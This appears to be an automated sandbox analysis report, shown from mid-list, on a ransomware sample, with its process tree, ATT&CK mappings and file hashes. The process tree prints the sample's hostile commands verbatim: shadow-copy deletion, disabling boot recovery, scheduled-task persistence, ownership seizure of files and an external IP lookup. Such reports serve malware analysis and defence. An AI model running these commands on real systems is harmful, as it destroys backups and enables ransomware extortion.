(x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoDev.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\Whistling.wav 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPrintTemplate.html 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02075_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_F_COL.HXK 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Foundry.eftx 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\CAN.WAV 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1872 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3064 vssadmin.exe 940 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2900 powershell.exe 1096 WMpaTI8a64.exe 1096 WMpaTI8a64.exe 1096 WMpaTI8a64.exe 2720 powershell.exe 2720 powershell.exe 2720 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1096 WMpaTI8a64.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 1096 WMpaTI8a64.exe Token: SeLoadDriverPrivilege 1096 WMpaTI8a64.exe Token: SeBackupPrivilege 2876 vssvc.exe Token: SeRestorePrivilege 2876 vssvc.exe Token: SeAuditPrivilege 2876 vssvc.exe Token: SeIncreaseQuotaPrivilege 312 WMIC.exe Token: SeSecurityPrivilege 312 WMIC.exe Token: SeTakeOwnershipPrivilege 312 WMIC.exe Token: SeLoadDriverPrivilege 312 WMIC.exe Token: SeSystemProfilePrivilege 312 WMIC.exe Token: SeSystemtimePrivilege 312 WMIC.exe Token: SeProfSingleProcessPrivilege 312 WMIC.exe Token: SeIncBasePriorityPrivilege 312 WMIC.exe Token: SeCreatePagefilePrivilege 312 WMIC.exe Token: SeBackupPrivilege 312 WMIC.exe Token: SeRestorePrivilege 312 WMIC.exe Token: SeShutdownPrivilege 312 WMIC.exe Token: SeDebugPrivilege 312 WMIC.exe Token: SeSystemEnvironmentPrivilege 312 WMIC.exe Token: SeRemoteShutdownPrivilege 312 WMIC.exe Token: SeUndockPrivilege 312 WMIC.exe Token: SeManageVolumePrivilege 312 WMIC.exe Token: 33 312 WMIC.exe Token: 34 312 WMIC.exe Token: 35 312 WMIC.exe Token: SeIncreaseQuotaPrivilege 312 WMIC.exe Token: SeSecurityPrivilege 312 WMIC.exe Token: SeTakeOwnershipPrivilege 312 WMIC.exe Token: SeLoadDriverPrivilege 312 WMIC.exe Token: SeSystemProfilePrivilege 312 WMIC.exe Token: SeSystemtimePrivilege 312 WMIC.exe Token: SeProfSingleProcessPrivilege 312 WMIC.exe Token: SeIncBasePriorityPrivilege 312 WMIC.exe Token: SeCreatePagefilePrivilege 312 WMIC.exe Token: SeBackupPrivilege 312 WMIC.exe Token: SeRestorePrivilege 312 WMIC.exe Token: SeShutdownPrivilege 312 WMIC.exe Token: SeDebugPrivilege 312 WMIC.exe Token: SeSystemEnvironmentPrivilege 312 WMIC.exe Token: SeRemoteShutdownPrivilege 312 WMIC.exe Token: SeUndockPrivilege 312 WMIC.exe Token: SeManageVolumePrivilege 312 WMIC.exe Token: 33 312 WMIC.exe Token: 34 312 WMIC.exe Token: 35 312 WMIC.exe Token: SeDebugPrivilege 2720 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2080 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2416 wrote to memory of 2080 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2416 wrote to memory of 2080 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2416 wrote to memory of 2080 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2416 wrote to memory of 2836 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2416 wrote to memory of 2836 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2416 wrote to memory of 2836 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2416 wrote to memory of 2836 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2416 wrote to memory of 2776 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2416 wrote to memory of 2776 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2416 wrote to memory of 2776 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2416 wrote to memory of 2776 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2776 wrote to memory of 2900 2776 cmd.exe 35 PID 2776 wrote to memory of 2900 2776 cmd.exe 35 PID 2776 wrote to memory of 2900 2776 cmd.exe 35 PID 2776 wrote to memory of 2900 2776 cmd.exe 35 PID 2416 wrote to memory of 2504 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 39 PID 2416 wrote to memory of 2504 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 39 PID 2416 wrote to memory of 2504 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 39 PID 2416 wrote to memory of 2504 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 39 PID 2416 wrote to memory of 1084 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 38 PID 2416 wrote to memory of 1084 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 38 PID 2416 wrote to memory of 1084 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 38 PID 2416 wrote to memory of 1084 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 38 PID 1084 wrote to memory of 304 1084 cmd.exe 40 PID 1084 wrote to memory of 304 1084 cmd.exe 40 PID 1084 wrote to memory of 304 1084 cmd.exe 40 PID 1084 wrote to memory of 304 1084 cmd.exe 40 PID 2504 wrote to memory of 1344 2504 cmd.exe 41 PID 2504 wrote to memory of 1344 2504 cmd.exe 41 PID 2504 wrote to memory of 1344 2504 cmd.exe 41 PID 2504 wrote to memory of 1344 2504 cmd.exe 41 PID 2504 wrote to memory of 2360 2504 cmd.exe 42 PID 2504 wrote to memory of 2360 2504 cmd.exe 42 PID 2504 wrote to memory of 2360 2504 cmd.exe 42 PID 2504 wrote to memory of 2360 2504 cmd.exe 42 PID 2416 wrote to memory of 2976 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 45 PID 2416 wrote to memory of 2976 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 45 PID 2416 wrote to memory of 2976 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 45 PID 2416 wrote to memory of 2976 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 45 PID 2504 wrote to memory of 1584 2504 cmd.exe 44 PID 2504 wrote to memory of 1584 2504 cmd.exe 44 PID 2504 wrote to memory of 1584 2504 cmd.exe 44 PID 2504 wrote to memory of 1584 2504 cmd.exe 44 PID 2976 wrote to memory of 1232 2976 cmd.exe 46 PID 2976 wrote to memory of 1232 2976 cmd.exe 46 PID 2976 wrote to memory of 1232 2976 cmd.exe 46 PID 2976 wrote to memory of 1232 2976 cmd.exe 46 PID 2976 wrote to memory of 3024 2976 cmd.exe 47 PID 2976 wrote to memory of 3024 2976 cmd.exe 47 PID 2976 wrote to memory of 3024 2976 cmd.exe 47 PID 2976 wrote to memory of 3024 2976 cmd.exe 47 PID 304 wrote to memory of 2824 304 wscript.exe 48 PID 304 wrote to memory of 2824 304 wscript.exe 48 PID 304 wrote to memory of 2824 304 wscript.exe 48 PID 304 wrote to memory of 2824 304 wscript.exe 48 PID 2976 wrote to memory of 1636 2976 cmd.exe 50 PID 2976 wrote to memory of 1636 2976 cmd.exe 50 PID 2976 wrote to memory of 1636 2976 cmd.exe 50 PID 2976 wrote to memory of 1636 2976 cmd.exe 50 PID 2824 wrote to memory of 1872 2824 cmd.exe 51 PID 2824 wrote to memory of 1872 2824 cmd.exe 51 PID 2824 wrote to memory of 1872 2824 cmd.exe 51 PID 2824 wrote to memory of 1872 2824 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1232 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgYYjK7.exe"2⤵PID:2080
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgYYjK7.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgYYjK7.exe" -n2⤵
- Executes dropped EXE
PID:2836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\S1XoxwMj.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\IdFAJ3bl.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\IdFAJ3bl.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\YZyXrxuJ.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\YZyXrxuJ.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1776
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2376
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\GQhX6eMY.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\GQhX6eMY.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1344
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2360
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\ugKo1AFp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Views/modifies file attributes
PID:1232
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:3024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMpaTI8a.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\WMpaTI8a.exeWMpaTI8a.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\WMpaTI8a64.exeWMpaTI8a.exe -accepteula "Dynamic.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6F89461-21A2-4A56-A282-1891C6351173} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]1⤵PID:2088
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\YZyXrxuJ.bat"2⤵PID:2836
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3064
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:940
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2160
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2456
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:2864
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5dc6977dc9e98ded535069dc6df89d45d
SHA1f7b5924fae6fcd36ab50c3bab3d69c33c54f3bf8
SHA2565a669383929a7ebc8b2d9fda86175662bf6b6ab50f32d92d9b17fcc3520c16af
SHA512a121d7cba7c7578b3243fd746eff5ab046d870e9f315a39aa4fd21632e2c2a67a23cdbe37de1be80ac97309fa9cfa257c7030f0e9306011fbcc0fd6378cf48be
-
Filesize
1.2MB
MD576b640aa00354e46b29ca7ac2adfd732
SHA1afebf9d72ba7186afefebf4deda87675621b0b8b
SHA2560b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
Filesize
128KB
MD5b5aa06904ce2f86ae24e07ecb148dc71
SHA1422db1a0e188f325df9ed359c0fd9fff67de33b3
SHA256978246c650d5278cbee8de89ac45a3f5a8ee206f1e293b4045fe0f1b9edba672
SHA512a0f0f3cc9ab969075d77dc272188713996753870267c86580297b41244bd5d6c3aeff20840ebb1fd44833865616b9539a9ab338e967b669af97ea77344c779d3
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
16KB
MD5bc6d4a309534fe436cc822d407aae3a2
SHA136de76f993a3f8e3e28b22126ef76b54fe1867d9
SHA25632146e07d8bf9f58ff3bc0bbdd34032721ad8d0af8c45ae96ddb3c10c059d161
SHA5128c5ee34f139bac1ccf340a0c1179d0753a500637b4837c2befca6aa4feeebeb3250179ae2b45179320a463eb4391f02c086530890c5dd0470ac25b99492fcd29
-
Filesize
246B
MD5b89c31303fe967e3590a2c9fd55c0d4f
SHA147a9fa9edf1381f7b987f04f3142811a90a6411c
SHA256801ec168d79e34f6223a92818b05d51ae810d18531b96cc0d99cd749381398e7
SHA51272f97f3527a191af71fb61d62fde711762b89ddcf1efd08bf677793672545686ed90d34b97e47881f0f198ab4b2e8c7de736aa963c9e22dc27bdd256406bd738
-
Filesize
260B
MD5933385c2581dbf9a4c263c21e047969f
SHA1c1f3423ecf3c467b2981d7509c9bed4fd1cc97b9
SHA2561ecba15be8ba7b4a9bf5ca2ede325968babc59bcedfdb324d03de406b65ceb05
SHA512ca93fca94ab4d109a7ca2c4e60781a4e4883664eee8a22ebb0b3f49a944d5f002c62720f69fd50f3595f8a02a728fa765beac2f2c41b563f756ea47119872b5b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WT8VKLXV73IGXBH4GDG7.temp
Filesize7KB
MD50b6daf9a838dff3d8d076e791c2f0ffd
SHA1ecfdbb4c91ff83c1b3c40e1cd5d15024b235a31a
SHA2560431383bf1e0b0c2043ece8580b2a80e81a605152d443f2a1ce01a76a8f8e27e
SHA512bcb7fbe0a83cd68121e1d10206c02f714953e21297c48289cd8817f4cc113d1f4045df27f44188f8787050935c0a15b73bf6da851e6eadbe5e76849674bd9a1d
-
Filesize
415B
MD5b2402d34a56b937cd22b4ced226d456e
SHA1e22f8f0f96501a008a1eb6150ae6fcb4b0df23d0
SHA2560d596c084584c41c395e430e31beb7ad7639f590cf0903ecbd6b5b2ada9cba0b
SHA512c6351c27f0df8e1c941f418ce5dfb9314c355ddc28edd7579e0e4c73bac42c7ee3e1c162e11c5ce02ec26a2b96ef872a7ee16aac46ed644b013b40e2512fe47c
-
Filesize
1024KB
MD5cc0f1b4b63af31c77f2e5de01f673324
SHA1e6285fbcb506244dc27452a7ebd895f8c40dfd47
SHA256c4987266afb17db8c8265990cd0a256c551bd2eecbc76f47aade1ce05f8db0bf
SHA5127f64d5573a5f5450e077300ea64f581840631f3f10edbf8db01307ff9ccfe76686d888f67f1f865e73efc22102ffe78388c66e72278dcdea5ea1b2d45191fa46
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6